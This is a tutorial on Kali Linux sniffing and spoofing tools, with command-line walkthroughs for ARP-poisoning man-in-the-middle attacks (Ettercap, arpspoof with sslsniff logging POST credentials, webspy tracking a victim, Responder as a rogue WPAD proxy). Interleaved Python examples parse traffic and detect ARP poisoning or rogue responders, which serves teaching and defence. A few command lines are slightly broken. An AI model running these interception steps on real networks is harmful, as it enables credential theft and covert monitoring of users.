What Is Sniffing?
A packet sniffer is a utility that has been used since the original release of Ethernet. Packet sniffing allows individuals to capture data as it is transmitted over a network. Packet sniffer programs are used by network professionals to diagnose network issues, and by malicious users to capture unencrypted data such as usernames and passwords from network traffic. Once this information is captured, the attacker can use it to gain access to the system or network.
Sniffing is the network equivalent of listening in on a conversation. For example, if you log in to a website that uses no encryption, your username and password can be sniffed off the network by anyone who can capture the traffic between you and the web site.
Network sniffing and spoofing can be done using the following tools:
Darkstat
Darkstat is a simple, web-based network traffic analyzer. It runs on many popular operating systems such as Linux, Solaris, Mac and AIX. It keeps running in the background as a daemon, continuously collecting and sniffing network data, and presents it in an easily understandable format in its web interface. It can generate traffic reports per host, identify which ports are open on a particular host, and is an IPv6-compliant application. Let's see how we can install and configure it on Linux.
darkstat accepts several options on the command line at startup. The main ones, each followed by an example invocation, are:
With option "-i" you can specify which interface is monitored:
darkstat -i eth1
With option "-p" you can specify the port on which the web interface listens, for example 8080:
darkstat -p 8080
To bind the web interface to a specific address instead of all interfaces, use option "-b". In the following example it is bound to the local loopback address:
darkstat -b 127.0.0.1
Persistent DNS resolution can be disabled with parameter "-n". This is useful for people without a flat rate or a dedicated line, since every displayed address otherwise costs a lookup:
darkstat -n
Use option "-P" to prevent darkstat from putting the interface into promiscuous mode. This is usually not advisable, because darkstat then only captures and analyzes the packets addressed to the MAC of the monitored network interface; all other packets are ignored:
darkstat -P
Parameter "-l" makes darkstat handle "SNAT" correctly for the local network. "SNAT" stands for "Source Network Address Translation" and means that your router replaces the local IP address of the client with its own public address, so it forwards the request on behalf of the client that originally sent it. Give it the local network and netmask:
darkstat -l 192.168.1.0/255.255.255.0
With parameter "-e" you can supply a packet filter expression (pcap filter syntax):
darkstat -e "port not 22"
From version 2.5 upwards you can detach darkstat from the starting terminal, so that it works like a daemon:
darkstat --detach
Via parameter "-d" you can specify the directory where darkstat creates its database:
darkstat -d /directory
Option "-v" activates verbose mode:
darkstat -v
If you are interested in the version number of darkstat or its full usage and syntax, try parameter "-h":
darkstat -h
DNSChef
The use of a DNS proxy is recommended in situations where it is not possible to force an application to use another proxy server directly. For example, some mobile applications completely ignore the OS HTTP proxy settings. In these cases, a DNS proxy server such as DNSChef lets you trick that application into forwarding its connections to the destination you choose.
Intercept all responses
Now that you know how to start DNSChef, let's configure it to fake all replies so that they point to 127.0.0.1, using the --fakeip parameter:
# ./dnschef.py --fakeip 127.0.0.1 -q
[*] DNSChef started on interface: 127.0.0.1
[*] Using the following nameservers: 126.96.36.199
[*] Cooking all A replies to point to 127.0.0.1
[23:55:57] 127.0.0.1: cooking the response of type 'A' for google.com to 127.0.0.1
[23:55:57] 127.0.0.1: proxying the response of type 'AAAA' for google.com
[23:55:57] 127.0.0.1: proxying the response of type 'MX' for google.com
These log lines were triggered by a lookup against the proxy from another terminal:
$ host google.com localhost
Notice that only the 'A' reply is cooked; the 'AAAA' and 'MX' queries are proxied unchanged to the real nameserver.
Let's fake one more request to illustrate how to target multiple records at the same time:
# ./dnschef.py --fakeip 127.0.0.1 --fakeipv6 ::1 -q
In addition to the --fakeip flag, I have now specified --fakeipv6, which is designed to fake 'AAAA' record queries.
At last, let's observe how the application handles queries of type ANY:
# ./dnschef.py --fakeip 127.0.0.1 --fakeipv6 ::1 --fakemail mail.fake.com --fakealias www.fake.com --fakens ns.fake.com -q
$ host -t ANY google.com localhost
A DNS ANY query results in DNSChef returning every faked record it knows about for an applicable domain, that is, all of the A, AAAA, MX, CNAME and NS values supplied on the command line above.
Filtering domains
Using the above example, suppose you only want to intercept requests for thesprawl.org and leave queries for all other domains, such as webfaction.com, unmodified. You can use the --fakedomains parameter as illustrated below:
# ./dnschef.py --fakeip 127.0.0.1 --fakedomains thesprawl.org -q
In this example the request for thesprawl.org is faked; however, a request for mx9.webfaction.com is left alone. Filtering domains is very useful when you want to isolate a single application without breaking the rest.
NOTE: DNSChef does not verify whether the domain exists before faking the response. If you have specified a domain, it will always resolve to the fake value whether it really exists or not.
Reverse filtering
In another situation you may need to fake responses for all requests except a defined list of domains. You can accomplish this with the --truedomains parameter as follows:
# ./dnschef.py --fakeip 127.0.0.1 --truedomains thesprawl.org,*.webfaction.com -q
There are several things going on in the above example. First, notice the use of a wildcard (*). All domains matching *.webfaction.com are reverse-matched and resolved to their true values. A request for 'google.com' returned 127.0.0.1 because it was not on the list of excluded domains.
NOTE: Wildcards are position specific. A mask of the form *.thesprawl.org will match www.thesprawl.org but not www.test.thesprawl.org. However, a mask of the form *.*.thesprawl.org will match thesprawl.org, www.thesprawl.org and www.test.thesprawl.org.
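The position-specific wildcard rule from the note above, written out as an added example (this is not DNSChef's own matching code). It assumes the rule stated in the notes: labels are compared from the right, '*' stands for exactly one label at its position, and, so that *.*.thesprawl.org can match thesprawl.org as the note says, a name with fewer labels than the mask matches when every unconsumed mask label is '*'. should_fake() then applies the --fakedomains / --truedomains semantics described above to a queried name.

```python
"""Position-specific wildcard matching for DNSChef-style domain filters.

Added example, not DNSChef's code. Rule implemented (the third point is
an assumption chosen to satisfy the examples in the note above):
  * labels are compared from the right (TLD first);
  * '*' matches exactly one label at its position;
  * a name with fewer labels than the mask still matches when every
    mask label left over on the left is '*'.
"""


def domain_matches(mask: str, name: str) -> bool:
    """True if `name` matches `mask` under the position-specific wildcard rule."""
    mask_rev = mask.lower().strip(".").split(".")[::-1]
    name_rev = name.lower().strip(".").split(".")[::-1]
    if len(name_rev) > len(mask_rev):
        # The name has more labels than the mask: a wildcard never spans two labels.
        return False
    for m, n in zip(mask_rev, name_rev):
        if m != "*" and m != n:
            return False
    # Any mask labels not consumed by the name must all be wildcards.
    return all(m == "*" for m in mask_rev[len(name_rev):])


def matches_any(masks, name: str) -> bool:
    return any(domain_matches(mask, name) for mask in masks)


def should_fake(name: str, fakedomains=(), truedomains=()) -> bool:
    """Decide whether a query for `name` receives a faked answer.

    --fakedomains: only names on the list are faked, everything else is proxied.
    --truedomains: everything is faked except names on the list.
    Neither list given: every name is faked (plain --fakeip behaviour).
    Like DNSChef, this never checks whether the name really exists.
    """
    if fakedomains:
        return matches_any(fakedomains, name)
    if truedomains:
        return not matches_any(truedomains, name)
    return True


if __name__ == "__main__":
    for mask in ("*.thesprawl.org", "*.*.thesprawl.org"):
        for n in ("thesprawl.org", "www.thesprawl.org", "www.test.thesprawl.org"):
            print(f"{mask:20} {n:25} {domain_matches(mask, n)}")
    print(should_fake("google.com", truedomains=["thesprawl.org", "*.webfaction.com"]))
```

Running it reproduces the three cases in the note and the --truedomains example above: google.com is faked because it matches no exclusion mask, while mx9.webfaction.com is matched by *.webfaction.com and left alone.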
DNSSpoof
DnsSpoof forges replies to arbitrary DNS address / pointer queries on the internal LAN. This is useful for bypassing host-name-based access controls, or for implementing a variety of efficient network controls.
In a corporate network DnsSpoof can be used to efficiently point clients to internal machines instead of externally hosted ones. Or, it can be used to keep clients from reaching certain host names that are not allowed by policy rules.
Ettercap-graphical
Ettercap stands for Ethernet Capture.
Ettercap is a comprehensive suite for man in the middle attacks.
It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.
Open Ettercap in graphical mode: # ettercap -G
Select the sniff mode: Sniff → Unified sniffing. Then scan for hosts inside your subnet: Hosts → Scan for hosts.
See the MAC and IP addresses of the hosts inside your subnet: Hosts → Hosts List. From this list, select the machines to poison.
We chose to ARP poison only the Windows machine 192.168.1.2 and the router 192.168.1.1.
Highlight the line containing 192.168.1.1 and click on the "target 1" button.
Highlight the line containing 192.168.1.2 and click on the "target 2" button.
Start the ARP poisoning: Mitm → Arp poisoning and start the sniffer to see the activities
hexinject
HexInject is a very versatile packet injector and sniffer that provides a command-line framework for raw network access. It is designed to work together with other command-line utilities, and for this reason it facilitates the creation of powerful shell scripts capable of reading, intercepting and modifying network traffic in a transparent manner.
hexinject -s -i eth0 -> sniffing eth0 interface
hexinject -s -i eth0 -r -> output in raw format
hexinject -s -i eth0 -r | strings -> using strings
hexinject -s -i eth0 -r | strings | Host -> filtering on hosts
echo 'abcd' | hexinject -p -i eth0 -r -> sending a custom string to the network
This will create a packet like this:
msgsnarf
# msgsnarf -i eth0
or you can filter specific hosts with a tcpdump filter expression:
# msgsnarf -i eth0 host 10.0.0.2
'-i': interface to listen or sniff on (for live connections)
If you use the '-p' option instead of '-i', you can read from a pcap capture file and parse it for conversations. This method is more for forensics purposes.
netsniff-ng
netsniff-ng is a free, performant Linux network analyzer and networking toolkit, the Swiss army knife for network packets, if you will. Its performance gain comes from built-in zero-copy mechanisms, so that on packet reception and transmission the kernel does not need to copy packets from kernel space to user space and vice versa. The netsniff-ng toolkit's primary goal is to facilitate a network developer's or hacker's daily Linux plumbing. It can be used for network development, debugging, analysis, auditing or network reconnaissance.
Passive discovery
Passive discovery is the activity of looking for and gathering information about a certain organization or network. While Kali Linux has a massive number of tools we can use for this, learning each of them can take a lot of time.
To solve this problem, we can use the discover scripts (previously known as backtrack-scripts) in our Kali Linux system. The framework was written by Lee Baird. The discover scripts not only incorporate various Kali tools but are also easy to use.
Responder
This tool is first of all an LLMNR and NBT-NS responder: it answers *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool only answers File Server Service requests, which is the suffix used for SMB. The idea is to target the answers and be stealthier on the network; it also helps to ensure that legitimate NBT-NS behaviour is not broken. You can set the -r option to 1 on the command line if you want the tool to answer the Workstation Service request name suffix as well.
Specify the IP address to redirect to (-i 192.168.1.202), enable the WPAD rogue proxy (-w On), answers for NetBIOS wredir (-r On), and fingerprinting (-f On):
root@kali:~# responder -i 192.168.1.202 -w On -r On -f On
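The name suffix that Responder keys on is the 16th byte of the NetBIOS name, hidden inside the 32-character "first-level" encoding that NBT-NS puts on the wire. The following added example (not Responder's code) decodes that encoding for name queries and positive replies as laid out in RFC 1002, maps the suffix to the service names from the KB article cited above, and shows the defender's counterpart to a rogue responder: queries for a canary name that no real host owns should never get a reply, so any reply for it identifies the responder's address. The sample packets are constructed by the helper functions at the bottom purely as parser input; nothing is sent.

```python
"""Decode NBT-NS (NetBIOS Name Service) name queries and replies by name suffix.

Added example, not Responder's code. Packet layouts follow RFC 1002;
the sample packets are constructed here and nothing is transmitted.
"""
from __future__ import annotations
import struct

# Name-suffix meanings from Microsoft KB163409 (the article linked above).
NETBIOS_SUFFIXES = {
    0x00: "Workstation Service",
    0x03: "Messenger Service",
    0x1B: "Domain Master Browser",
    0x1C: "Domain Controllers",
    0x1D: "Master Browser",
    0x1E: "Browser Service Elections",
    0x20: "File Server Service",
}

NBNS_FLAG_RESPONSE = 0x8000   # R bit of the header flags
NBNS_FLAG_BROADCAST = 0x0010  # B bit inside NM_FLAGS


def encode_netbios_name(name: str, suffix: int) -> bytes:
    """First-level encoding: 15-char space-padded name + suffix byte, each nibble + 'A'."""
    raw = name.upper().encode("ascii")[:15].ljust(15, b" ") + bytes([suffix])
    out = bytearray()
    for b in raw:
        out.append((b >> 4) + 0x41)
        out.append((b & 0x0F) + 0x41)
    return bytes(out)


def decode_netbios_name(encoded: bytes) -> tuple[str, int]:
    """Inverse of encode_netbios_name; returns (name, suffix)."""
    if len(encoded) != 32:
        raise ValueError("first-level encoded NetBIOS name must be 32 bytes")
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41)
                for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def parse_nbns(packet: bytes) -> dict:
    """Parse an NBT-NS name query or a positive name query response (NB record)."""
    trn_id, flags, _qd, ancount, _ns, _ar = struct.unpack(">HHHHHH", packet[:12])
    if packet[12] != 0x20 or packet[45] != 0x00:
        raise ValueError("unexpected question/RR name encoding")
    name, suffix = decode_netbios_name(packet[13:45])
    info = {
        "trn_id": trn_id,
        "response": bool(flags & NBNS_FLAG_RESPONSE),
        "broadcast": bool(flags & NBNS_FLAG_BROADCAST),
        "name": name,
        "suffix": suffix,
        "service": NETBIOS_SUFFIXES.get(suffix, "unknown"),
    }
    if info["response"] and ancount >= 1:
        # RR_TYPE, RR_CLASS, TTL, RDLENGTH, then RDATA = NB_FLAGS + NB_ADDRESS
        _rtype, _rclass, ttl, _rdlen = struct.unpack(">HHIH", packet[46:56])
        _nb_flags, addr = struct.unpack(">H4s", packet[56:62])
        info["ttl"] = ttl
        info["address"] = ".".join(str(b) for b in addr)
    return info


def rogue_responder_alert(packet: bytes, canary_names: set[str]) -> str | None:
    """Return an alert when a reply claims a canary name that no real host owns."""
    info = parse_nbns(packet)
    if info["response"] and info["name"] in canary_names:
        return (f"rogue NBT-NS responder: {info['address']} answered for "
                f"{info['name']}<{info['suffix']:02X}> ({info['service']})")
    return None


# --- constructed sample packets (parser input only; never transmitted) -------
def sample_query(name: str, suffix: int = 0x20, trn_id: int = 0x1234) -> bytes:
    header = struct.pack(">HHHHHH", trn_id, 0x0110, 1, 0, 0, 0)  # query, RD, broadcast
    return (header + b"\x20" + encode_netbios_name(name, suffix) + b"\x00"
            + struct.pack(">HH", 0x0020, 0x0001))               # QTYPE NB, QCLASS IN


def sample_response(name: str, suffix: int, address: str, trn_id: int = 0x1234) -> bytes:
    header = struct.pack(">HHHHHH", trn_id, 0x8500, 0, 1, 0, 0)  # response, AA, RD
    rr = b"\x20" + encode_netbios_name(name, suffix) + b"\x00"
    rr += struct.pack(">HHIH", 0x0020, 0x0001, 300000, 6)        # NB, IN, TTL, RDLENGTH
    rr += struct.pack(">H", 0x0000) + bytes(int(o) for o in address.split("."))
    return header + rr


if __name__ == "__main__":
    print(parse_nbns(sample_query("FILESRV01", 0x20)))
    print(rogue_responder_alert(sample_response("NOSUCHHOST", 0x20, "192.168.1.202"),
                                {"NOSUCHHOST"}))
```

In a real deployment the canary name would be queried periodically from a monitoring host and every UDP/137 reply for it logged with the answering address; the 192.168.1.202 in the sample is simply the address from the command above reused as constructed test data.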
sslsniff
sslsniff is designed to create man-in-the-middle (MITM) attacks for SSL/TLS connections, and dynamically generates certificates for the domains being accessed on the fly. The new certificates are constructed in a certificate chain that is signed by any certificate that is provided. sslsniff also supports other attacks like null-prefix or OCSP attacks to achieve silent interception of connections when possible.
Start the attack
Connect both the Linux and Windows hosts to the network. Enable IP forwarding on the Linux host:
# echo 1 > /proc/sys/net/ipv4/ip_forward
Configure iptables to re-route all TCP 443 requests to port 999, where sslsniff will be listening:
# iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 999
Start up sslsniff in targeted mode, listening on port 999, writing a log file, enabling OCSP denial, and logging only HTTP POST data, which is where user credentials are carried:
# sslsniff -t -c /usr/share/sslsniff/certs/spoofed_site -s 999 -w /tmp/sslsniff.log -d -p
Begin ARP poisoning. Assuming the Windows host has an IP address of 10.0.0.5 and the router's inside address is 10.0.0.1:
# arpspoof -i eth0 -t 10.0.0.5 10.0.0.1
This starts a continuous stream of ARP replies from the attacker to the Windows host.
TCPflow
TCPflow is a program that captures data transmitted as part of TCP connections (flows) and stores it in a way that is convenient for protocol analysis or debugging. A program like "tcpdump" or "wireshark" shows a summary of the packets seen on the wire, but usually does not store the data that is actually being transmitted. In contrast, TCPflow reconstructs the actual data streams, thousands or millions of them if need be, and stores each flow in a separate file for later analysis.
TCPflow understands sequence numbers and will correctly reconstruct data streams regardless of retransmissions or out-of-order delivery. However, it currently cannot handle IP fragments: flows containing IP fragments will not be recorded correctly, and 802.11 headers are not handled either.
Suppose we need all the HTTP traffic in the network. To capture everything from one host (replace the address with your target):
tcpflow -ce host 192.168.0.100
To capture all traffic on port 80:
tcpflow -ce port 80
To capture only the web traffic of one host:
tcpflow -ce host 192.168.0.100 and port 80 or port 443
Note that in pcap filter syntax "and" and "or" have equal precedence and associate left to right, so the last filter actually means "(host 192.168.0.100 and port 80) or port 443"; write "host 192.168.0.100 and (port 80 or port 443)" to restrict both ports to the target.
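The reassembly property described above (correct streams despite retransmissions and out-of-order delivery) is the interesting part of what tcpflow does, so here is an added example of that core step; it is not tcpflow's code. Segments are grouped by the (source, port, destination, port) tuple, each payload is placed at its sequence-number offset, the first copy of any byte wins so a retransmission changes nothing, and holes that never arrived are reported as gaps. The segments are constructed (an HTTP request arriving out of order with one retransmit, and a response with three bytes missing); the filename helper mirrors tcpflow's zero-padded naming, and the lowest sequence number seen is assumed to be the stream start since no SYN tracking is done here.

```python
"""Per-flow TCP payload reassembly from out-of-order and retransmitted segments.

Added example, not tcpflow's code. Input segments are constructed below.
"""
from __future__ import annotations
from dataclasses import dataclass, field
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class FlowKey:
    src: str
    sport: int
    dst: str
    dport: int

    def filename(self) -> str:
        # tcpflow style: 192.168.000.100.51000-192.168.000.010.00080
        def fmt(ip: str, port: int) -> str:
            return ".".join(f"{int(o):03d}" for o in ip.split(".")) + f".{port:05d}"
        return f"{fmt(self.src, self.sport)}-{fmt(self.dst, self.dport)}"


@dataclass
class Segment:
    src: str
    sport: int
    dst: str
    dport: int
    seq: int
    payload: bytes

    def key(self) -> FlowKey:
        return FlowKey(self.src, self.sport, self.dst, self.dport)


@dataclass
class Flow:
    """Collects (seq, payload) pairs; stream() rebuilds the byte stream."""
    pieces: List[Tuple[int, bytes]] = field(default_factory=list)

    def add(self, seq: int, payload: bytes) -> None:
        if payload:
            self.pieces.append((seq, payload))

    def stream(self) -> Tuple[bytes, List[Tuple[int, int]]]:
        """Return (data, gaps); gaps are (offset, length) holes never seen on the wire.

        Assumption: the lowest sequence number seen is the stream start
        (a full reassembler would take it from the SYN).
        """
        if not self.pieces:
            return b"", []
        base = min(seq for seq, _ in self.pieces)
        end = max(seq + len(p) for seq, p in self.pieces)
        data = bytearray(end - base)
        seen = bytearray(end - base)
        for seq, payload in sorted(self.pieces):
            off = seq - base
            for i, b in enumerate(payload):
                if not seen[off + i]:       # first copy wins; retransmits are ignored
                    data[off + i] = b
                    seen[off + i] = 1
        gaps, i = [], 0
        while i < len(seen):
            if seen[i]:
                i += 1
                continue
            j = i
            while j < len(seen) and not seen[j]:
                j += 1
            gaps.append((i, j - i))
            i = j
        return bytes(data), gaps


def reassemble(segments: List[Segment]) -> Dict[FlowKey, Tuple[bytes, List[Tuple[int, int]]]]:
    """Group segments per flow and rebuild each direction's byte stream."""
    flows: Dict[FlowKey, Flow] = {}
    for s in segments:
        flows.setdefault(s.key(), Flow()).add(s.seq, s.payload)
    return {k: f.stream() for k, f in flows.items()}


# Constructed capture: the request arrives out of order with one retransmission;
# the response is missing three bytes in the middle.
REQUEST = b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"
SAMPLE_SEGMENTS = [
    Segment("192.168.0.100", 51000, "192.168.0.10", 80, 1025, REQUEST[25:]),   # arrives first
    Segment("192.168.0.100", 51000, "192.168.0.10", 80, 1000, REQUEST[:10]),
    Segment("192.168.0.100", 51000, "192.168.0.10", 80, 1010, REQUEST[10:25]),
    Segment("192.168.0.100", 51000, "192.168.0.10", 80, 1000, REQUEST[:10]),   # retransmit
    Segment("192.168.0.10", 80, "192.168.0.100", 51000, 5000, b"HTTP/1.1 200 OK\r\n"),
    Segment("192.168.0.10", 80, "192.168.0.100", 51000, 5020, b"Hello"),        # bytes 17-19 lost
]

if __name__ == "__main__":
    for key, (data, gaps) in reassemble(SAMPLE_SEGMENTS).items():
        print(key.filename(), len(data), "bytes, gaps:", gaps)
        print(data)
```

The gap list is what a forensic analyst wants alongside the stream: a zero-filled hole means the capture, not the conversation, lost data at that offset.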
Webspy
webspy sends URLs sniffed from a client to your local Netscape browser for display, updated in real time (as the target surfs, your browser surfs along with them, automagically). Netscape must be running on your local X display ahead of time.
This is about how to sniff traffic on your local network and browse along with the victim. As the victim browses web pages, the same pages keep appearing in our local browser on the Kali Linux machine. The mechanism is simple: we ARP poison the victim after setting up IP forwarding on our Kali Linux machine, then use webspy and the Iceweasel browser to follow the victim's browsing.
The tutorial assumes that you have Kali Linux up and running.
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.100
webspy -i wlan0 192.168.1.101 (the victim's IP address)
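The Ettercap, sslsniff and webspy walkthroughs above all rest on the same ARP poisoning step, and on the wire it leaves the same two symptoms: an IP address that suddenly "moves" to another MAC, and one MAC claiming several IP addresses at once. The following added example (not Ettercap's, arpspoof's or webspy's code) is a small monitor for those symptoms: it keeps a learned IP-to-MAC table plus an optional table of static bindings (the gateway pinned by the administrator) and raises an alert for each. The log lines are constructed in the style of tcpdump's ARP output using the router and Windows host addresses from the Ettercap section; they are not a real capture.

```python
"""Detect ARP-cache poisoning from a stream of ARP replies.

Added example, not the code of any tool on this page. The sample lines
are constructed (tcpdump-style text, not a real capture).
"""
import re
from typing import Dict, Iterable, List, Optional, Tuple

ARP_REPLY = re.compile(
    r"ARP, Reply (\d{1,3}(?:\.\d{1,3}){3}) is-at ([0-9a-fA-F]{2}(?::[0-9a-fA-F]{2}){5})"
)


def analyze_arp_replies(lines: Iterable[str],
                        trusted: Optional[Dict[str, str]] = None) -> List[Tuple]:
    """Return alerts as (kind, subject, detail) tuples, in order of detection."""
    trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    learned: Dict[str, str] = {}          # ip -> last MAC seen claiming it
    claims: Dict[str, set] = {}           # mac -> set of IPs it has claimed
    alerts: List[Tuple] = []
    for line in lines:
        m = ARP_REPLY.search(line)
        if not m:
            continue                      # ARP requests and non-ARP lines are ignored
        ip, mac = m.group(1), m.group(2).lower()
        # 1. A static binding (e.g. the gateway) contradicted: alert every time,
        #    because poisoning replies are re-sent continuously.
        if ip in trusted and trusted[ip] != mac:
            alerts.append(("trusted-binding-violated", ip, mac))
        # 2. A learned IP moving to a different MAC: alert once per change.
        prev = learned.get(ip)
        if prev is not None and prev != mac:
            alerts.append(("ip-moved", ip, f"{prev}->{mac}"))
        learned[ip] = mac
        # 3. One MAC answering for more than one IP: alert when the set grows.
        ips = claims.setdefault(mac, set())
        if ip not in ips:
            ips.add(ip)
            if len(ips) > 1:
                alerts.append(("mac-claims-multiple-ips", mac, tuple(sorted(ips))))
    return alerts


# Constructed sample: the router (192.168.1.1) and the Windows host (192.168.1.2)
# from the Ettercap walkthrough answer normally, then a third MAC claims both.
SAMPLE_LINES = [
    "12:00:01.000000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:01 (oui Unknown), length 28",
    "12:00:01.500000 ARP, Reply 192.168.1.2 is-at 00:11:22:33:44:02 (oui Unknown), length 28",
    "12:00:02.000000 ARP, Request who-has 192.168.1.2 tell 192.168.1.1, length 28",
    "12:00:05.000000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:99 (oui Unknown), length 28",
    "12:00:05.010000 ARP, Reply 192.168.1.2 is-at 00:11:22:33:44:99 (oui Unknown), length 28",
    "12:00:06.000000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:99 (oui Unknown), length 28",
]
TRUSTED = {"192.168.1.1": "00:11:22:33:44:01"}   # gateway pinned by the administrator

if __name__ == "__main__":
    for alert in analyze_arp_replies(SAMPLE_LINES, TRUSTED):
        print(*alert)
```

Two caveats before using this heuristic in earnest: the "mac-claims-multiple-ips" rule also fires on legitimate setups (routers with several addresses, virtual IPs, proxy ARP), so it needs an allow-list, and the "ip-moved" rule fires once per change, so a host whose network card was replaced produces exactly one alert rather than a stream, which is a useful way to tell a genuine change from an ongoing poisoning.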
Wireshark
Wireshark is the world's foremost network protocol analyzer. It lets you see what's happening on your network at a microscopic level. It is the de facto (and often de jure) standard across many industries and educational institutions. Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.
Capturing Packets
After downloading and installing Wireshark, you can launch it and click the name of an interface under Interface List to start capturing packets on that interface. For example, if you want to capture traffic on the wireless network, click your wireless interface. You can configure advanced features by clicking Capture Options, but this isn't necessary for now.
As soon as you click the interface's name, you'll see the packets start to appear in real time. Wireshark captures each packet sent to or from your system. If you're capturing on a wireless interface and have promiscuous mode enabled in your capture options, you'll also see the other packets on the network.
Click the stop capture button near the top left corner of the window when you want to stop capturing traffic.